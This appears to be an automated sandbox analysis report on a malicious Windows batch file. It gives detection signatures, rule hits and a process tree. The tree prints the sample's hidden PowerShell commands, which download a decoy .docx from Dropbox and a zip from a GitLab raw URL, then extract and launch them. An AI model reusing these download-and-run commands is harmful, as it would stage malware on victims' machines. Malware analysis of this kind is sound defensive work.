Edit tour
Windows
Analysis Report
hnbose1711.bat
Overview
General Information
Detection
Abobus Obfuscator
Score: | 84 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Abobus Obfuscator
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 5432 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\hnbos e1711.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 4268 cmdline:
chcp.com 4 37 MD5: 33395C4732A49065EA72590B14B64F32) - find.exe (PID: 4936 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - findstr.exe (PID: 5040 cmdline:
fIndstr /L /I set "C :\Users\us er\Desktop \hnbose171 1.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 3160 cmdline:
fIndstr /L /I goto " C:\Users\u ser\Deskto p\hnbose17 11.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 2232 cmdline:
fIndstr /L /I echo " C:\Users\u ser\Deskto p\hnbose17 11.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 6632 cmdline:
fIndstr /L /I pause "C:\Users\ user\Deskt op\hnbose1 711.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - cmd.exe (PID: 1608 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - find.exe (PID: 5904 cmdline:
find MD5: 4BF76A28D31FC73AA9FC970B22D056AF) - cmd.exe (PID: 6112 cmdline:
C:\Windows \system32\ cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 5460 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //www.drop box.com/sc l/fi/2xk4d viogo9yr2o se1z39/17_ Advertisin g_Campaign _and_Colla boration.d ocx?rlkey= 4wos6vvfhg osyi024mde vofd9&st=q e97degd&dl =1', 'C:\U sers\user\ AppData\Lo cal\Temp\\ 17_Adverti sing_Campa ign_and_Co llaboratio n.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 4920 cmdline:
powershell -WindowSt yle Hidden -Command "Start-Pro cess 'C:\U sers\user\ AppData\Lo cal\Temp\\ 17_Adverti sing_Campa ign_and_Co llaboratio n.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 5856 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //gitlab.c om/bose151 1/mkt1511/ -/raw/main /17Fukrun. zip', 'C:\ Users\Publ ic\Documen t.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 4280 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "Add-T ype -Assem blyName Sy stem.IO.Co mpression. FileSystem ; [System. IO.Compres sion.ZipFi le]::Extra ctToDirect ory('C:/Us ers/Public /Document. zip', 'C:/ Users/Publ ic/Documen t')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AbobusObfuscator | Yara detected Abobus Obfuscator | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | DNS query: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |